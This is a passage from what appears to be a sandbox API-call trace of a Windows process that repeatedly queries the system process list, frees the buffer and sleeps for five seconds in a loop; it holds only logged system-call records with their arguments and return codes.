BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0127.984] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0127.986] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0127.987] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.000] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.000] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.001] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.001] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.001] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.004] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.004] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.014] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.014] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.015] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.015] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.015] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.018] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.018] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.034] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.034] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.035] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.035] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.036] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.038] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.039] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.045] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.046] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.047] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.047] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.049] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.049] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.062] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.062] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.063] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.063] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.066] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.066] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.076] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.077] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.077] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.077] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.080] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.080] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.092] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.092] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.093] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.093] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.093] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.095] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.095] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.108] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.108] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.109] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.109] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.110] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.114] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.115] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.123] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.124] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.124] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.124] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.125] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.127] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.128] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.139] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.139] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.139] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.140] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.140] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.142] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.143] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.154] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.155] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.155] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.155] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.156] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.158] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.159] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.171] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.172] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.172] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.172] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.173] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.175] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.176] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.186] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.187] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.187] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.187] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.188] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.190] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.190] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.201] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.202] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.202] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.202] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.203] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.206] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.206] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.217] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.217] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.217] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.217] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.220] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.220] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.232] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.233] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.233] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.233] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.234] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.235] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.236] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.248] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.248] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.249] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.249] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.249] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.251] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.251] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.263] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.264] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.264] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.265] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.265] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.268] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.268] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.280] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.280] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.281] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.281] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.283] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.283] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.295] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.295] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.296] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.296] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.296] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.299] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.299] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.310] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.311] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.311] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.311] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.312] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.313] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, 